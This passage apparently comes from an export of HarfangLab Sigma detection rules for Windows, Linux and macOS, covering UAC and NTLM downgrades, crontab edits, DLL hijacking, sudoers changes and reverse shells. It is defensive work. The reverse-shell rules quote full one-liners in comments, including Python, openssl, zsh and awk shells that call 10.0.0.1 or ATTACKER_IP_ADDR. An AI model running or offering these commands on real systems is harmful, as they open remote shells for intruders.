"https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration", + "https://twitter.com/1ZRR4H/status/1575364101148114944", + "https://attack.mitre.org/techniques/T1548/" + ], + "name": "t1548_uac_consent_config_change.yml", + "content": "title: UAC Registry Configuration Modified\nid: 2b08e300-2cbf-4b7f-8b71-d33804657613\ndescription: |\n Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\n Attackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\n It is recommended to investigate this action to 
determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/application-security/application-control/user-account-control/settings-and-configuration\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://attack.mitre.org/techniques/T1548/\ndate: 2022/11/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n filter_disable:\n Details:\n - 'DWORD (0x00000000)' # This is handled by the rule 189eeb83-5aec-4186-97ea-ad22929a4f15\n - 'DWORD (0x00000005)' # This is the default value\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n 
ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_device_enroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n ProcessParentImage: '?:\\Windows\\system32\\svchost.exe'\n\n exclusion_clickshare:\n ProcessCommandLine|endswith: '\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\ClickShareButtonApp-{????????-????-????-????-????????????}.exe'\n # C:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_amd64_2911b58ce63436e2\\BarcoClickShareSvc.exe\n ProcessGrandparentImage: '?:\\Windows\\System32\\DriverStore\\FileRepository\\barcoclicksharedrv.inf_*\\BarcoClickShareSvc.exe'\n Details: 'DWORD (0x00000002)'\n\n # c6d36742ebd7db317f2740a67c37ec08608f85ecdfa093315823cc37c5cc7d06\n exclusion_clickshare_2:\n ProcessImage: '?:\\ClickShareApp\\ClickShare\\app-?.??.?-???\\clickshare_native.exe'\n\n exclusion_vaudio:\n ProcessImage: '?:\\Program Files (x86)\\Common Files\\VAudio\\Audckq32.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n Details: 'DWORD (0x00000004)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b08e300-2cbf-4b7f-8b71-d33804657613", + "rule_name": "UAC Registry Configuration Modified", + "rule_description": "Detects a partial disabling of the UAC consent window in the User Account Control registry configuration.\nAttackers may change this configuration in order to locally elevate privileges quietly or allow future attackers to do so.\nIt is recommended to investigate this action to determine its legitimacy.\n", + "rule_creation_date": "2022-11-03", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + 
"rule_technique_tags": [ + "attack.t1548" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.089034Z", + "creation_date": "2026-03-23T11:45:34.089036Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.089040Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1595/002/" + ], + "name": "t1595_002_linux_exp_suggester_perl.yml", + "content": "title: Linux-Exploit-Suggester Hacktool Executed via Perl\nid: 2b0a3397-e688-4bb7-ae09-07debeea1a9d\ndescription: |\n Detects common commands from linux-exploit-suggester-2.\n linux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\n It is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\n If so, it is recommended to block the user and isolate the machine for further forensics.\nreferences:\n - 
https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Perl\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentImage|endswith: '/perl'\n CommandLine: 'sh -c uname -r |cut -d\"-\" -f1'\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b0a3397-e688-4bb7-ae09-07debeea1a9d", + "rule_name": "Linux-Exploit-Suggester Hacktool Executed via Perl", + "rule_description": "Detects common commands from linux-exploit-suggester-2.\nlinux-exploit-suggester is an open-source Perl script for suggesting privilege escalation exploits on Linux.\nIt is recommended to investigate the context of this execution to determine if this is a legitimate action conducted by an administrator to test his systems or if it is part of an attack.\nIf so, it is recommended to block the user and isolate the machine for further forensics.\n", + "rule_creation_date": "2022-11-21", + "rule_modified_date": "2025-04-14", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [], + "rule_technique_tags": [ + "attack.t1595.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b16b989-2088-48a9-a2e4-ff125b31a00e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + 
"rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.621402Z", + "creation_date": "2026-03-23T11:45:34.621404Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.621408Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level", + "www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions", + "https://attack.mitre.org/techniques/T1562/001/", + "https://attack.mitre.org/techniques/T1112/" + ], + "name": "t1562_001_netlm_downgrade.yml", + "content": "title: NetLM Downgraded\nid: 2b16b989-2088-48a9-a2e4-ff125b31a00e\ndescription: |\n Detects the downgrade of the NetLM configuration in the Windows registry.\n The modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\n This weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level\n - www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://attack.mitre.org/techniques/T1562/001/\n - 
https://attack.mitre.org/techniques/T1112/\ndate: 2020/11/09\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel'\n Details:\n - 'DWORD (0x00000000)'\n - 'DWORD (0x00000001)'\n - 'DWORD (0x00000002)'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains: '|?:\\MININT\\Tools\\X64\\TsManager.exe|?:\\MININT\\Tools\\X64\\TsmBootstrap.exe|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b16b989-2088-48a9-a2e4-ff125b31a00e", + "rule_name": "NetLM Downgraded", + 
"rule_description": "Detects the downgrade of the NetLM configuration in the Windows registry.\nThe modification of LmCompatibilityLevel registry value to 2 or less disables the use of NTLMv2 session security.\nThis weaken the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n", + "rule_creation_date": "2020-11-09", + "rule_modified_date": "2026-03-16", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1112", + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b26abb8-6656-496d-8bdf-d47537666c04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093694Z", + "creation_date": "2026-03-23T11:45:34.093696Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093700Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md", + "https://attack.mitre.org/techniques/T1053/003/" + ], + "name": "t1053_003_crontab_edit_macos.yml", + "content": "title: Cron Jobs Edited via Crontab (macOS)\nid: 2b26abb8-6656-496d-8bdf-d47537666c04\ndescription: |\n Detects the execution of the crontab command to edit cron jobs.\n An attacker could use crontab to add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/crontab'\n CommandLine|contains: ' -e'\n condition: selection\nlevel: medium\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b26abb8-6656-496d-8bdf-d47537666c04", + "rule_name": "Cron Jobs Edited via Crontab (macOS)", + "rule_description": "Detects the execution of the crontab command to edit cron jobs.\nAn attacker could use crontab to add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-01-30", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1053.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.592619Z", + "creation_date": "2026-03-23T11:45:34.592625Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.592638Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/xforcered/WFH", + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_rdpinput.yml", + "content": "title: DLL Hijacking via rdpinput.exe\nid: 2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1\ndescription: |\n Detects potential Windows DLL Hijacking via rdpinput.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - 
https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpinput.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\winsta.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b4e82d9-d3b0-4aef-8866-05ac0d89d9f1", + "rule_name": "DLL Hijacking via rdpinput.exe", + "rule_description": "Detects potential Windows DLL Hijacking via rdpinput.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ 
+ "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.095413Z", + "creation_date": "2026-03-23T11:45:34.095415Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.095419Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux", + "https://attack.mitre.org/techniques/T1059/006/" + ], + "name": "t1059_006_reverse_shell_python_macos.yml", + "content": "title: Reverse Shell Executed via Python (macOS)\nid: 2b5b655e-f7bb-4864-9202-ad7b2087ae12\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Python.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process 
launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/11/14\nmodified: 2025/01/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2b5b655e-f7bb-4864-9202-ad7b2087ae12", + "rule_name": "Reverse Shell Executed via Python (macOS)", + "rule_description": "Detects a suspicious command line related to a reverse shell execution via Python.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-01-10", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" 
+ ], + "rule_technique_tags": [ + "attack.t1059.006" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2bade688-d13f-4317-9d07-3994ff35201f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.623552Z", + "creation_date": "2026-03-23T11:45:34.623554Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623559Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html", + "https://www.revshells.com/", + "https://attack.mitre.org/techniques/T1059/004/", + "https://attack.mitre.org/techniques/T1559/" + ], + "name": "t1059_004_reverse_shell_command_line_linux.yml", + "content": "title: Reverse Shell Execution from Command-line\nid: 2bade688-d13f-4317-9d07-3994ff35201f\ndescription: |\n Detects different suspicious usages of the shell that are related to reverse shells.\n A reverse shell is shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\n It is recommended to investigate the process tree for suspicious 
activities.\nreferences:\n - https://hacktricks.wiki/en/generic-hacking/reverse-shells/linux.html\n - https://www.revshells.com/\n - https://attack.mitre.org/techniques/T1059/004/\n - https://attack.mitre.org/techniques/T1559/\ndate: 2022/07/01\nmodified: 2026/03/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - attack.t1559\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.RemoteShell\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_command:\n CommandLine|contains:\n - 'http://reverse-shell.sh/'\n - 'https://reverse-shell.sh/'\n - 'sh -i*>*/dev/tcp/*'\n - 'sh -i*>*/dev/udp/*'\n - 'exec *<>*/dev/tcp/*'\n - 'exec *<>*/dev/udp/*'\n - 'sh*0>*/dev/tcp/'\n - 'sh*0>*/dev/udp/'\n - 'sh -i <&3 >&3 2>&3'\n # openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :\n - 's_client*-connect*:*|*sh*|*s_client*-connect*:*'\n # mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s\n - '2>&1*openssl*s_client'\n # zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 9001 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'\n - 'zmodload zsh/net/tcp * ztcp'\n\n # awk 'BEGIN {s = \"/inet/tcp/0//\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n selection_awk_protocol:\n CommandLine|contains:\n - '/inet/tcp/'\n - '/inet/udp/'\n selection_awk_command:\n CommandLine|contains|all:\n - 'BEGIN '\n - 'printf'\n - 'getline '\n - 'close('\n\n exclusion_localhost:\n CommandLine|contains:\n - '/dev/tcp/127.0.0.1/'\n - '/dev/tcp/localhost/'\n - '/dev/udp/127.0.0.1/'\n - '/dev/udp/localhost/'\n\n exclusion_commandline:\n CommandLine|contains:\n - '/dev/tcp/$HOST/$PORT'\n - '/dev/tcp/${host}/${port}'\n\n exclusion_containerd:\n 
- ParentImage:\n - '/bin/runc'\n - '/bin/containerd-shim-runc-v2'\n - '/usr/bin/containerd-shim-runc-v2'\n - Ancestors|contains:\n - '|/bin/runc|'\n - '|/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n condition: (selection_command or all of selection_awk_*) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2bade688-d13f-4317-9d07-3994ff35201f", + "rule_name": "Reverse Shell Execution from Command-line", + "rule_description": "Detects different suspicious usages of the shell that are related to reverse shells.\nA reverse shell is shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\nIt is recommended to investigate the process tree for suspicious activities.\n", + "rule_creation_date": "2022-07-01", + "rule_modified_date": "2026-03-17", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1059.004", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2bb34ffc-2356-4191-b774-bc4fc82ee828", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": 
"sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-24T07:14:08.712525Z", + "creation_date": "2026-03-23T11:45:34.612480Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.612488Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1", + "https://attack.mitre.org/techniques/T1548/003/" + ], + "name": "t1548_003_sudo_config_modified_linux.yml", + "content": "title: Sudo Configuration Modified (Linux)\nid: 2bb34ffc-2356-4191-b774-bc4fc82ee828\ndescription: |\n Detects a suspicious attempt to modify the content of '/etc/sudoers' or any file within '/etc/sudoers.d'.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to investigate the process responsible for this action for suspicious activities.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2022/10/27\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SystemModification\n 